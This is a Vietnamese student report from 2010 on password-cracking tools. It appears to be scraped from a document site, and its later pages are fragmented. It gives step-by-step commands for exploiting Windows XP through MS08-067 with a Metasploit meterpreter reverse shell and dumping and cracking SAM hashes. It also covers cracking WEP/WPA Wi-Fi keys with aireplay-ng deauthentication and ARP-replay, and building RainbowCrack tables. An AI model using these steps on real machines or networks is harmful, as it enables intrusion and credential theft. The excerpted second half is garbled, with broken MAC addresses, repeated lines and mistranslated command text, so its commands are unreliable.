BỘ GIÁO DỤC VÀ ĐÀO TẠO TRƯỜNG ĐẠI HỌC MỞ TPHCM KHOA CÔNG NGHỆ THÔNG TIN  Giáo Viên Hướng Dẫn : T.S Đào Thế Long Sinh viên: 1. Phan Công Lâm, Mssv:09H1012053 2.Nguyễn Thúc Toàn,Mssv:09H1012110 3.Nguyễn Huy Tưởng,Mssv:09H1012125 10, tháng 11, năm 2010 Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 1 Ophcrack là phần mềm khôi phục mật khẩu Windows miễn phí tốt nhất hiện nay.Đối với người được trang bị những hiểu biết cơ bản về hệ điều hành mà lần đầu tiên muốn khôi phục mật khẩu thì Ophcrack quả là một công cụ rất nhanh và dễ dàng sử dụng. Để sử dụng Ophcrack, bạn không cần phải truy cập vào Windows để phục hồi mật khẩu đã mất.Ophcrack cung cấp cho bạn file ISO miễn phí và bạn có thể ghi ra đĩa CD rồi khởi chạy đĩa CD đó. Khi chương trình Ophcrack đã chạy, bạn xác định vị trí tài khoản người dùng Windows và thực hiện quá trình khôi phục mật khẩu. Tất cả các bước thực hiện hoàn toàn là tự động. 1. Cài đặt OPHCRACK Việc cài đặt Ophcrack tương đối dễ, tuy nhiên có phần lựa chọn các thành phần cài đặt cần lưu ý –Hình 1. Hình 1: Chọn các compornents để cài đặt vào mục tables cho ophcrack Trên Hình 1, nếu đã download, có thể lựa chọn một số lựa chọn sau: - Continue without install the table: Cài đặt chỉ có chương trình Ophcrack, khôngcó Rainbow Table. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 2 - Download alphanumenic table from Internet (388MB-SSTI04-10K): cài đặt và download Rainbow Table loại SSTI04-10K. - Download alphanumenic table from Internet (733MB-SSTI04-5K): cài đặt và download Rainbow Table loại SSTI04-5K. - Install alphanumenic table from CD or DVD (388MB-SSTI04-10K): cài đặt Ophcrack và sử dụng Rainbow Table loại SSTI04-10K từ CD hoặc DVD. - Install alphanumenic table from CD or DVD (733MB-SSTI04-5K): cài đặt Ophcrack và sử dụng Rainbow Table loại SSTI04-5K từ CD hoặc DVD. Rainbow Table loại SSTI04-5K có kích thước 733MB được dùng cho các máy tính có RAM từ 512MB trở lên. Rainbow Table loại SSTI04-10K có kích thước 388MB được dùng cho các máy tính ít RAM hơn. Nếu trong trường hợp bạn download riêng đĩa LiveCD, hoặc download các Rainbow Table theo link dưới đây, thì lựa chọn Continue without install the table. Code: Rainbow Table loại SSTI04-10K (388MB) http://lasecwww.epfl.ch/SSTIC04-10k.zip Rainbow Table loại SSTI04-5K (733MB) http://lasecwww.epfl.ch/SSTIC04-5k.zip Sau khi cài đặt, chạy chương trình, giao diện của Ophcrack như Hình 2. Hình 2: Giao diện Ophcrack trên Windows Trên hình 2, trước khi sử dụng, click vào nút Tables để chọn đường dẫn đến bảng Rainbow Table – hình 3. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 3 Hình 3: Select ophcrack table. Trên Hình 3, mở đến đĩa LiveCD, mục slax\ophcrack\tables, sau đó nhắp OK. 2. Kết hợp metasploit với ophcrack crack password window winxp sp2. Trong ví dụ này chúng ta sẽ dùng backtrack 4, trong đĩa backtrack này có tích hợp sẵn metasploit và ophcrack. Sau đây là các bước để thực hiện các bước crack một password của window xp sp2. ở đây ta sẽ lợi dụng lỗi bảo mật “Microsoft Security Bulletin MS08-067 của Microsoft cho Windows Server Service” để khai thác thông tin. Đây là lỗ hổng nghiêm trọng nằm trong dịch vụ Server Service RPC của hệ điều hành Windows.Với lỗi này, Hacker hoàn toàn có thể điều khiển máy tính từ xa với quyền cao nhất của hệ thống. Mức độ nguy hiểm: Rất cao. Mô tả kỹ thuật Server Service là dịch vụ cho phép máy tính cài đặt hệ điều hành Windows có thể chia sẻ file, máy in,… qua mạng và là dịch vụ không thể thiếu của hệ điều hành. Dịch vụ này hỗ trợ giao thức RPC, trong đó có một chức năng tiếp nhận và xử lý một yêu cầu muốn chuyển đổi đường dẫn (vídụ \\C\Program Files\ \Windows) về định dạng đường dẫn Canonicalization (\\C\Windows). Tuy nhiên, quá trình xử lý này đã không kiểm soát độ dài của đường dẫn trong yêu cầu và xảy ra lỗi tràn bộ đệm. Như vậy, với việc thực hiện một yêu cầu RPC với đường dẫn có độ dài “quá khổ”, Hacker dễ Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 4 dàng thực thi mã độc trên các máy tính từ xa nhằm chiếm quyền điều khiển, cài đặt virus, ăn cắp thông tin… Các bước thực hiện Bước 1: Khi chúng ta khởi động backtrack. Chúng ta mở một console và gõ lệnh theo cú pháp sau để chạy metasploit. Theo như tấm hình này ta sẽ sử dụng metasploit phiên bản 3. Bước2: ta gõ cú pháp : “use exploit/windows/smb/ms08_067_netapi” để sử dụng lỗi bảo mật này. Bước3 : ở bước này ta sẽ thực hiện các lệnh để cấu hình các thuộc tính để chuẩn bị cho cuộc tấn công chiếm quyền điều khiển. Cú pháp : set payload windows/meterpreter/reverse_tcp //Meta-Interpreter là một advanced payload. Muc đích của nó là để cung cấp những tập lệnh để khai thác, tấn công các máy remote computers.Nó được viết từ các developers dưới dạng shared object( DLL) files. Meterpreter và các thành phần mở rộng được thực thi trong bộ nhớ, hoàn toàn không được ghi Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 5 lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống virus Meterpreter cung cấp một tập lệnh để chúng ta có thể khai thác trên các remote computers. set RHOST 192.168.1.1 // đây là địa chỉ ip của máy victim. set LHOST 192.168.1.2 // đây là địa chỉ ip của máy tấn công. Khi đã chuẩn bị xong các cấu hình ta sẽ có một bảng với các thong số như hình trên. Bước4: ở bước này ta sẽ tiến hành khai thác lỗi. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 6 Bước5 : Khi đã vào được máy victim. Ta dung lệnhh ashdump để hash files an trong window xp. Bước6 :Ở bước thứ 5 ta đã hash dump được file sam trong win. Ta sẽ copy đoạn hash dump đó vào trong file text. Và lưu lại. Bước7 :ta khởi động chương trình ophcrack GUI và tiến hành crack mật khẩu. Ta sẽ load file hash đã được tạo từ bước 6 vàovà nhấn nút crack. Và đợi chờ kết quả của chương trình trả về. Lưu ý :Khi sử dụng ophcrack chúng ta phải có bộ directories của rainbow table. Chúng ta có thể download các tables đó ở đây. Link download :http://sourceforge.net/projects/ophcrack/files/tables/ Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 7 Dưới đây là các hình ảnh dung phần mềm ophcrack để crack file hash. Hình1 : load file hash đã copy được Hình2 :Nhấn nút crack để bắt đầu crack mật khẩu file hash Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 8 Hình3 :Khi chạy xong chúng ta sẽ thấy password đã được crack hiển thị ở cột NT Pwd. I.Giới Thiệu Về Wireless Lan(wlan),WEP,WPA • WLAN là một loại mạng máy tính nhưng việc kết nối giữa các thành phần trong mạng không sử dụng các loại cáp như một mạng thông thường, môi trường truyền thông của các thành phần trong mạng là không khí. Các thành phần trong mạng sử dụng sóng điện từ để truyền thông với nhau.Institute of Electrical and Electronics Engineers(IEEE) đã phê chuẩn sự ra đời của chuẩn 802.11, với tên gọi WIFI (Wireless Fidelity) cho các mạng WLAN.Là một bộ giao thức cho thiết bị không dây dựa trên chuẩn 802.11a/b/g bao gồm các Access Point và các thiết bị đầu cuối không dây như pc card, usb card, wifi PDA… kết nối với nhau. Wifi hiện nay có 3 kiểu mã hoá chính gồm: WEP-Wired Equivalent Privacy , WPA-Wireless Protected Access và WPA2. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 9 • WEP (Wired Equivalent Privacy) là một hệ thống dùng để mã hóa, giải mã dữ liệu và bảo mật dữ liệu cho mạng Wireless, WEP là một phần của chuẩn 802.11 gốc dựa trên thuật toán mã hóa RC4, mã hóa dữ liệu 40bit để ngăn chặn sự truy cập trái phép từ bên ngoài. • WPA (Wi-fi Protected Access) được thiết kế nhằm thay thế cho WEP vì có tính bảo mật cao hơn. Temporal Key Intergrity Protocol (**IP), còn được gọi là WPA key hashing là một sự cải tiến dựa trên WEP, là vì nó tự động thay đổi khóa, điều này gây khó khăn rất nhiều cho các Attacker dò thấy khóa của mạng.Mặt khác WPA cũng cải tiến cả phương thức chứng thực và mã hóa. WPA bảo mật mạnh hơn WEP rất nhiều. II.Aircrack-ng: II.1-Giới thiệu Aircrack-ng: Hầu như hiện nay khi nhắc tới Crack password Wireless thì chúng ta nghĩ ngay đến chương trình Aircrack. Aircrack là chương trình crack password wireless rất mạnh, một công cụ bẻ khóa WEP/WPA nhanh nhất,chạy được trên Windows và Linux. Aircrack hỗ trợ các chuẩn không giây 802.11a/b/g dùng để Crack WEP và WPA-PSK. Nó có thể giải mã các mã hóa WEP sử dụng key có chiều dài từ 40 tới 512-bits và đủ cho giải mã hầu hết các gói tin trên mạng Wireless. Công cụ này còn hỗ trợ để bẻ khóa WPA1 và WPA2 bằng phương thức Brute Force Attack. Ngoài ra với airdecap chúng có khả năng giải mã các file được mã hóa bởi WEP và WPA. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 10 [...]... nhanh Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 18 Bước 4 : Đến khi cột #Data được trên 20.000 gói thì ta bắt đầu dò password từ file cap (được tạo ra ở bước 2) bằng lệnh aircrack-ng Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 19 Password dò được là 09871771 85 (sau khi đã lọc ra các dấu “ : “ ) IV .Crack Password Wireless WPA Bằng Aircrack Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất. .. ta phải “đá” client ra : Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 23 aireplay-ng -0 1 : deauthenticate 1 lần -a 0 0:1 3:D 4:6 8:D 2:0 8 : set Access Point MAC address -c 0 0:1 6:4 4:7 B:F9:BC : set Destination MAC address mon0 : interface ảo của wireless card dùng cho việc monitor => lệnh này có nghĩa là : mon0 sẽ giả danh AP 0 0:1 3:D 4:6 8:D 2:0 8 và gởi đến client 0 0:1 6:4 4 :7 B:F9:BC thông tin rằng “anh... md5_loweralpha-numeric#1-7_2_3800x3 355 4432_0.rt 7_2_3800x3 355 4432_0.rt 51 2MB md5_loweralpha-numeric#1-7_3_3800x3 355 4432_0.rt 7_3_3800x3 355 4432_0.rt 51 2MB md5_loweralpha-numeric#1-7_4_3800x3 355 4432_0.rt 7_4_3800x3 355 4432_0.rt 51 2MB md5_loweralpha-numeric#1-7 _5_ 3800x3 355 4432_0.rt 51 2MB md5_loweralpha-số # 151 2MB md5_loweralpha-số # 151 2MB md5_loweralpha-số # 151 2MB md5_loweralpha-số # 151 2MB md5_loweralpha-số # 151 2MB md5_loweralpha-số... Administrator :5 0 0:1 c3a2b6d939a1021aad3b435b51404ee:e24106942bf38bcf57a6a4b2 9016eff 6:: : Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 34 Guest :5 0 1:a296c9e4267e9ba9aad3b435b51404ee:9d978dda95e5185bbeda9b3ae00f84 b 4:: : Các tập tin pwdump là đầu ra của pwdump2, pwdump3 hoặc các tiện ích khác Nó chứa cả LM hash và NTLM hash Để crack hashes LM trong file pwdump, sử dụng lệnh sau đây: rcrack c:\rt\*.rt -f pwdump_file rcrack c: \ rt \ * rt-f pwdump_file... aireplay-ng -3 : standard ARP-request replay -x 1000 : “bơm” 1000 gói mỗi giây (max là 1024 gói, mặc định là 50 0) -b 0 0:1 4:6 C:06:D 7:9 6 : MAC address, Access Point -h 0 0:1 3:E8:BE:E9:C5 : set Source MAC address , tức là MAC của client mon0 : interface ảo của wireless card dùng cho việc monitor => lệnh này có nghĩa là : mon0 sẽ giả client 0 0:1 3:E8:BE:E9:C5 để “bơm” ARP vào AP 0 0:1 4:6 C:06:D 7:9 6, mỗi giây... 3800 3 355 4432 0 rtgen md5 loweralpha-số 1 7 2 1 7 3 3800 3 355 4432 0 rtgen md5 loweralpha-số 1 7 3 1 7 4 3800 3 355 4432 0 rtgen md5 loweralpha-số 1 7 4 1 7 5 3800 3 355 4432 0 rtgen md5 loweralpha-số 1 7 5 Cuối cùng, những file này được tạo ra: md5_loweralpha-numeric#1-7_0_3800x3 355 4432_0.rt 7_0_3800x3 355 4432_0.rt 51 2MB md5_loweralpha-numeric#1-7_1_3800x3 355 4432_0.rt 7_1_3800x3 355 4432_0.rt 51 2MB md5_loweralpha-numeric#1-7_2_3800x3 355 4432_0.rt... cầu kết nối với AP , vì vậy ta phải “đá” client ra : aireplay-ng -0 1 : deauthenticate 1 lần -a 0 0:1 4:6 C:06:D 7:9 6 : set Access Point MAC address -c 0 0:1 3:E8:BE:E9:C 5: set Destination MAC address mon0 : interface ảo của wireless card dùng cho việc monitor => lệnh này có nghĩa là : mon0 sẽ giả danh AP 0 0:1 4:6 C:06:D 7:9 6 và gởi đến client 0 0:1 3:E8:BE:E9:C5 thông tin rằng “anh đã bị đá ra khỏi mạng” , client... từ thì mất khoảng 750 0 giây ~ 2 giờ 5 phút Để rút ngắn thời gian thì ta sẽ dùng aircrack-ng kết hợp với database : Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 26 Tốc độ đạt được gần 40.000 từ trên 1 giây -> 3 triệu từ mất hơn 1 phút Sau 1 phút 19 giây thì đã dò ra được password Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 27 I.Giới thiệu về RainbowCrack : RainbowCrack là chương trình... lệnh sau đây: rtsort md5_loweralpha-numeric#1-7_0_3800x3 355 4432_0.rt 7_0_3800x3 355 4432_0.rt rtsort md5_loweralpha-numeric#1-7_1_3800x3 355 4432_0.rt 7_1_3800x3 355 4432_0.rt rtsort md5_loweralpha-numeric#1-7_2_3800x3 355 4432_0.rt 7_2_3800x3 355 4432_0.rt rtsort md5_loweralpha-numeric#1-7_3_3800x3 355 4432_0.rt 7_3_3800x3 355 4432_0.rt rtsort md5_loweralpha-numeric#1-7_4_3800x3 355 4432_0.rt 7_4_3800x3 355 4432_0.rt... cầu vồng l : rtgen md5 loweralpha-numeric 1 7 0 3800 3 355 4432 0 rtgen md5 loweralpha-numeric 1 7 1 3800 3 355 4432 0 rtgen md5 loweralpha-numeric 1 7 2 3800 3 355 4432 0 rtgen md5 loweralpha-numeric 1 7 3 3800 3 355 4432 0 rtgen md5 loweralpha-numeric 1 7 4 3800 3 355 4432 0 rtgen md5 loweralpha-numeric 1 7 5 3800 3 355 4432 0 1 7 0 3800 3 355 4432 0 rtgen md5 loweralpha-số 1 7 1 3800 3 355 4432 0 rtgen md5 loweralpha-số . ra : aireplay-ng -0 1 : deauthenticate 1 lần -a 0 0:1 4:6 C:06:D 7:9 6 : set Access Point MAC address -c 0 0:1 3:E8:BE:E9:C 5: set Destination MAC address mon0 :. lệnh aircrack-ng Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 19 Password dò được là 09871771 85 (sau khi đã lọc ra các dấu “ : “ ) IV .Crack Password